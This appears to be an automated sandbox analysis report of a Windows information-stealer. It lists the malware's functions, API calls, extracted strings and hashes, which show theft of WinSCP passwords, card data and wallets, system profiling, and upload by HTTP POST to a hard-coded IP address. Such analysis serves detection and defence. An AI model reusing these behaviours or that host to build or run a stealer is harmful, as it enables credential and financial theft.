                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • Sleep.KERNEL32(00014FF0,342E3837,logs,?,00000001,00000000,00000001,00000000), ref: 00408A72
                                                                                                                                            • DeleteFileA.KERNEL32(?,342E3837,logs,?,00000001,00000000,00000001,00000000), ref: 00408AB6
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\ProgramData), ref: 00408AC1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$Directory$Create$Current$H_prolog3$ByteCharMultiWide__wgetenv_memmove_strtok$DeleteFileH_prolog3_Ios_base_dtorNameProcessSleepUser__localtime64_s__time64_asctime_sstd::ios_base::_
                                                                                                                                            • String ID: [Software]$*.*$.zip$/freebl3.dll$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$78.47.81.226$C:\ProgramData$CPU Count: $Computer Name: $Date: %s$Display Language: $Display Resolution: $F$GUID: %s$HWID: %s$Keyboard Languages: $Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $[Hardware]$[Processes]$\files$\files\$\files\Wallets$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$ccount$files\information.txt$logs
                                                                                                                                            • API String ID: 383292104-2644626209
                                                                                                                                            • Opcode ID: 48073240c53578cf64c3166f1dd7fe0580e103c5e6fb9b70339d7683f9614d20
                                                                                                                                            • Instruction ID: 76e61114f8193afa42e4d3941c313752b4bca86246428ac05b614a47e8c777ef
                                                                                                                                            • Opcode Fuzzy Hash: 48073240c53578cf64c3166f1dd7fe0580e103c5e6fb9b70339d7683f9614d20
                                                                                                                                            • Instruction Fuzzy Hash: 39E23EB1804248AEDF15EB95CD59EEE7B7CAF11308F0000BBB505B71E2DA785B45CB6A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040FC2D, Relevance: 75.4, APIs: 50, Instructions: 410memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040FC46
                                                                                                                                              • Part of subcall function 0040E5E7: __EH_prolog3_GS.LIBCMT ref: 0040E5EE
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104,00000001,?,00000104,0000002C), ref: 0040FCB2
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FCB5
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FCCB
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FCCE
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FD10
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FD27
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FD2A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104), ref: 0040FD54
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FD57
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0040FD5E
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FD61
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FD77
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FD7A
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FDA3
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FDB4
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FDB7
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104), ref: 0040FDD6
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FDD9
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0040FDE0
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FDE3
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FDFB
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FE0C
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FE0F
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104), ref: 0040FE35
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FE38
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0040FE3F
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FE42
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FE5A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FE6B
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FE6E
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 0040FE89
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FE8C
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FEEC
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000001,00000000,00000001,00000000,?,?,00000010), ref: 0040FF12
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000010), ref: 0040FF15
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000010), ref: 0040FF2D
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000010), ref: 0040FF30
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FF48
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000010), ref: 0040FF54
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 0040FF57
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104,?,?,?,?,?,00000010), ref: 0040FF7E
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 0040FF81
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104,?,?,?,?,?,00000010), ref: 0040FF88
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 0040FF8B
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FFA3
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000010), ref: 0040FFB4
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,?,?,?,?,?,00000010), ref: 00410051
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 00410054
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010), ref: 0040FFB7
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$Free$Alloc_strcpy_s$_memmove$H_prolog3H_prolog3_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 264996938-0
                                                                                                                                            • Opcode ID: 7eefab3cefad26b2a2cfb2e3889bd5bc507751d1799e025b2c366df9f4cb9300
                                                                                                                                            • Instruction ID: 963acffb7d0471ef235fa3b9da86eae878c99035d12f65e47b49228b3326c77f
                                                                                                                                            • Opcode Fuzzy Hash: 7eefab3cefad26b2a2cfb2e3889bd5bc507751d1799e025b2c366df9f4cb9300
                                                                                                                                            • Instruction Fuzzy Hash: 2BE1E771C0025AAFCF11EFA5CD959EEBFB9FF18304F10042AF505A2291D7799A48CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004100A7, Relevance: 73.8, APIs: 27, Strings: 15, Instructions: 298registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004100C6
                                                                                                                                            • _memset.LIBCMT ref: 004100E6
                                                                                                                                            • _memset.LIBCMT ref: 00410106
                                                                                                                                            • _memset.LIBCMT ref: 0041011A
                                                                                                                                            • _memset.LIBCMT ref: 00410128
                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041014E
                                                                                                                                            • RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00410174
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00410186
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0041019C
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004101AD
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 004101C3
                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 004101E4
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004101FA
                                                                                                                                            • _fprintf.LIBCMT ref: 00410253
                                                                                                                                            • _fprintf.LIBCMT ref: 0041025E
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,00000001,00000000,passwords.txt), ref: 00410283
                                                                                                                                            • _fprintf.LIBCMT ref: 00410292
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 004102BE
                                                                                                                                            • _fprintf.LIBCMT ref: 004102E6
                                                                                                                                            • _fprintf.LIBCMT ref: 00410301
                                                                                                                                            • _fprintf.LIBCMT ref: 0041030E
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00410332
                                                                                                                                            • _fprintf.LIBCMT ref: 00410341
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,00000001,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00410373
                                                                                                                                              • Part of subcall function 0040FC2D: __EH_prolog3.LIBCMT ref: 0040FC46
                                                                                                                                              • Part of subcall function 0040FC2D: GetProcessHeap.KERNEL32(00000008,00000104,00000001,?,00000104,0000002C), ref: 0040FCB2
                                                                                                                                              • Part of subcall function 0040FC2D: HeapAlloc.KERNEL32(00000000), ref: 0040FCB5
                                                                                                                                              • Part of subcall function 0040FC2D: GetProcessHeap.KERNEL32(00000000,?), ref: 0040FCCB
                                                                                                                                              • Part of subcall function 0040FC2D: HeapFree.KERNEL32(00000000), ref: 0040FCCE
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • _fprintf.LIBCMT ref: 004103C5
                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004103EC
                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00410419
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$CloseValue$Heap_memset$EnumH_prolog3OpenProcess_memmove$AllocFree
                                                                                                                                            • String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                            • API String ID: 2505226420-1600676177
                                                                                                                                            • Opcode ID: fa79755bfc9af6273edaf0538fc76bc7376c993af6c600ad827949e81b2d9654
                                                                                                                                            • Instruction ID: 39147ee87225176abd13f9b5f2772b7af1d4e4bf0d005c020a800a264740afd0
                                                                                                                                            • Opcode Fuzzy Hash: fa79755bfc9af6273edaf0538fc76bc7376c993af6c600ad827949e81b2d9654
                                                                                                                                            • Instruction Fuzzy Hash: 46B14CB190464DAFDB21DF90CC85EEE7BBCFF14304F10052BF915A2191EBB99A448B69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040EFD7, Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 257filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040EFF6
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0040F025
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040F034
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040F041
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040F2AF
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                              • Part of subcall function 0040EE8C: __EH_prolog3_GS.LIBCMT ref: 0040EE93
                                                                                                                                              • Part of subcall function 0040EE8C: _memset.LIBCMT ref: 0040EEEE
                                                                                                                                              • Part of subcall function 0040EE8C: LocalAlloc.KERNEL32(00000040,?,00000000,?,?), ref: 0040EF29
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F137
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F145
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F14C
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F15A
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F161
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F16F
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F176
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1B9
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1CB
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1D9
                                                                                                                                              • Part of subcall function 004651EC: __lock_file.LIBCMT ref: 00465233
                                                                                                                                              • Part of subcall function 004651EC: __stbuf.LIBCMT ref: 004652B7
                                                                                                                                              • Part of subcall function 004651EC: __output_l.LIBCMT ref: 004652C7
                                                                                                                                              • Part of subcall function 004651EC: __ftbuf.LIBCMT ref: 004652D1
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1E0
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1EE
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1F5
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F203
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F20A
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F24D
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F267
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryH_prolog3H_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
                                                                                                                                            • String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp
                                                                                                                                            • API String ID: 742969294-2676079308
                                                                                                                                            • Opcode ID: 9a1ff3b5ec212b63b97feaa6bf565faa88cae23b0fce30aeed7a7395cd08714b
                                                                                                                                            • Instruction ID: 41a1b07a139927d8b28aa61a3c4fcd4cd036e5ece06f079f741c1f6db0b4ef9b
                                                                                                                                            • Opcode Fuzzy Hash: 9a1ff3b5ec212b63b97feaa6bf565faa88cae23b0fce30aeed7a7395cd08714b
                                                                                                                                            • Instruction Fuzzy Hash: BD81A172900218AFDF15BBA1DD06EEF7B78EF05318F10002BF500B6192EA799A05876D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040AFC9, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 277networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040AFE8
                                                                                                                                            • __cftof.LIBCMT ref: 0040B0AA
                                                                                                                                            • InternetOpenA.WININET(0000002F,00000000,?,00000000,00000000), ref: 0040B0C5
                                                                                                                                            • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 0040B0E8
                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0040B109
                                                                                                                                            • InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 0040B122
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00400000,00000001), ref: 0040B145
                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040B19F
                                                                                                                                            • __itow_s.LIBCMT ref: 0040B1B3
                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040B202
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0040B210
                                                                                                                                            • HttpQueryInfoA.WININET(00000000,0000002E,?,00000010,00000000), ref: 0040B22D
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040B238
                                                                                                                                            • __cftof.LIBCMT ref: 0040B264
                                                                                                                                              • Part of subcall function 00465F9A: __mbsnbcpy_s_l.LIBCMT ref: 00465FAD
                                                                                                                                            • InternetOpenUrlA.WININET(00000010,00000000,00000000,00000000,00400000,00000000), ref: 0040B278
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040B28D
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040B2A5
                                                                                                                                            • InternetCloseHandle.WININET(00000010), ref: 0040B2AE
                                                                                                                                              • Part of subcall function 0040A91B: __EH_prolog3.LIBCMT ref: 0040A93A
                                                                                                                                              • Part of subcall function 0040A91B: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040A974
                                                                                                                                              • Part of subcall function 0040A91B: InternetReadFile.WININET(?,?,000003E8,?), ref: 0040A98E
                                                                                                                                              • Part of subcall function 0040A91B: _memmove.LIBCMT ref: 0040A9C3
                                                                                                                                              • Part of subcall function 0040A91B: _memset.LIBCMT ref: 0040A9F4
                                                                                                                                              • Part of subcall function 0040A91B: HttpQueryInfoA.WININET(?,0000001D,00000010,?,00000000), ref: 0040AA0A
                                                                                                                                              • Part of subcall function 0040A91B: CoCreateInstance.OLE32(0048C204,00000000,00000001,0048C214,?), ref: 0040AA2F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$Http$CloseHandleRequest$Open$FileH_prolog3HeadersInfoOptionQuery__cftof$ConnectCreateInstancePointerReadSend__itow_s__mbsnbcpy_s_l_memmove_memset
                                                                                                                                            • String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
                                                                                                                                            • API String ID: 405163766-1095625359
                                                                                                                                            • Opcode ID: 16953e37433a5d171d9ded644ccd5d8cc20305432fd0ace2b59c47e4471a483e
                                                                                                                                            • Instruction ID: 8c326ffee177061100a964f2ec751e2812a0f434affac283da5b9361bac1f087
                                                                                                                                            • Opcode Fuzzy Hash: 16953e37433a5d171d9ded644ccd5d8cc20305432fd0ace2b59c47e4471a483e
                                                                                                                                            • Instruction Fuzzy Hash: 01A18C71100209BFDB11EF65CC85EEE7BA9EB14704F40443EF902A72D1DBB99A45CBA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F58E, Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 173filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040F5E0
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040F5F2
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040F602
                                                                                                                                            • _memset.LIBCMT ref: 0040F60F
                                                                                                                                            • _sprintf.LIBCMT ref: 0040F621
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040F790
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6C3
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6CA
                                                                                                                                              • Part of subcall function 004651EC: __lock_file.LIBCMT ref: 00465233
                                                                                                                                              • Part of subcall function 004651EC: __stbuf.LIBCMT ref: 004652B7
                                                                                                                                              • Part of subcall function 004651EC: __output_l.LIBCMT ref: 004652C7
                                                                                                                                              • Part of subcall function 004651EC: __ftbuf.LIBCMT ref: 004652D1
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6D6
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6DD
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6EE
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6F5
                                                                                                                                              • Part of subcall function 0040EE8C: __EH_prolog3_GS.LIBCMT ref: 0040EE93
                                                                                                                                              • Part of subcall function 0040EE8C: _memset.LIBCMT ref: 0040EEEE
                                                                                                                                              • Part of subcall function 0040EE8C: LocalAlloc.KERNEL32(00000040,?,00000000,?,?), ref: 0040EF29
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F739
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F755
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryH_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memmove_sprintflstrcat
                                                                                                                                            • String ID: CC\%s_%s.txt$Card: $Month: $Name: $P~$Year: $\temp
                                                                                                                                            • API String ID: 3490499488-3184349237
                                                                                                                                            • Opcode ID: 4d1bab22662bf2d85dc7cae6f7b8356e5ba75d9f2fb73295126096e405e21a66
                                                                                                                                            • Instruction ID: 375c8d56659635c03b1ae029337d4ff1e5e419fe9f3589a5b4e7b91812957303
                                                                                                                                            • Opcode Fuzzy Hash: 4d1bab22662bf2d85dc7cae6f7b8356e5ba75d9f2fb73295126096e405e21a66
                                                                                                                                            • Instruction Fuzzy Hash: D3517272D00208ABDF21BBA1DC46FDE7BBCAF05314F20402BF505B7192EA795A058B69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F2D8, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 228stringfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040F32A
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040F33F
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040F348
                                                                                                                                            • _memset.LIBCMT ref: 0040F358
                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040F36D
                                                                                                                                            • lstrcatA.KERNEL32(?,00481844), ref: 0040F37B
                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040F387
                                                                                                                                            • lstrcatA.KERNEL32(?,004829F4), ref: 0040F395
                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040F3A1
                                                                                                                                            • lstrcatA.KERNEL32(?,.txt), ref: 0040F3AF
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040F570
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040F48E
                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040F4B8
                                                                                                                                            • lstrcatA.KERNEL32(?,004826E0), ref: 0040F4CD
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F51C
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F538
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
                                                                                                                                            • String ID: %s%s%s%s%s%s%s$.txt$\temp$`~
                                                                                                                                            • API String ID: 1987428508-712868223
                                                                                                                                            • Opcode ID: 83d7b0f0d402fb5ab414e92f12f69adf38714f820b799d82948da44694c94832
                                                                                                                                            • Instruction ID: bfda652ba386e7a89f0fff0543faf4871bd6da48c932a5193f4737e1604b755e
                                                                                                                                            • Opcode Fuzzy Hash: 83d7b0f0d402fb5ab414e92f12f69adf38714f820b799d82948da44694c94832
                                                                                                                                            • Instruction Fuzzy Hash: 62715171D00248ABEF21AFE5DD45EDE7BB9EB14314F10043BF904BB191EB7999458B18
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411B13, Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 449fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00411B32
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411CCD
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 004117F6
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411806
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 0041190B
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 0041191E
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411941
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411952
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411976
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411982
                                                                                                                                              • Part of subcall function 0041044C: __EH_prolog3.LIBCMT ref: 0041046B
                                                                                                                                              • Part of subcall function 0041044C: _memset.LIBCMT ref: 00410495
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 004104B6
                                                                                                                                              • Part of subcall function 0041044C: _memset.LIBCMT ref: 004104C1
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 004104D4
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,00481844,?,?,?,?,?,00000014), ref: 004104E2
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 004104F1
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041208E
                                                                                                                                            • _memset.LIBCMT ref: 004120A9
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411C19
                                                                                                                                              • Part of subcall function 00465BDA: _strnlen.LIBCMT ref: 00465C0F
                                                                                                                                              • Part of subcall function 00465BDA: __lock.LIBCMT ref: 00465C20
                                                                                                                                              • Part of subcall function 00465BDA: __getenv_helper_nolock.LIBCMT ref: 00465C2D
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411B74
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 0041150B: __EH_prolog3_catch_GS.LIBCMT ref: 00411515
                                                                                                                                            • __wgetenv.LIBCMT ref: 004120B3
                                                                                                                                            • DeleteFileA.KERNEL32(00482C44), ref: 00412151
                                                                                                                                            • DeleteFileA.KERNEL32(00482C40), ref: 00412158
                                                                                                                                              • Part of subcall function 004111EE: __EH_prolog3.LIBCMT ref: 0041120D
                                                                                                                                              • Part of subcall function 004111EE: __wgetenv.LIBCMT ref: 00411219
                                                                                                                                              • Part of subcall function 004111EE: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 004112C5
                                                                                                                                              • Part of subcall function 004111EE: CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 004112FC
                                                                                                                                              • Part of subcall function 0040B49F: _memset.LIBCMT ref: 0040B4C0
